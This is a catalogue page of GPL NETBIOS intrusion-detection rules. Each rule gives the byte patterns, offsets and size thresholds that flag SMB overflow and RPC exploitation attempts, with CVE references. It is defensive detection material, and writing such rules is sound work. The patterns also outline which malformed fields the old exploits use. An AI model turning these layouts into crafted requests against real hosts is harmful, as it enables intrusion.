Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103256

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103256; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103257

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103257; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103258

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103258; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103259

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103259; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102946

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102946; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102936

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102936; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102947

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102947; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102937

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102937; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103018

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103018; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103020

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103020; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103219

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103219; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103218

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103218; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377|url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103221

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103221; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103220

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103220; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103409

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103409; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103410

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103410; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103411

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103411; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103412

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103412; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103240

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103240; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103241

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103241; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103115

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103115; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103114

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103114; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103117

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103117; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103116

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103116; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103098

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103098; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

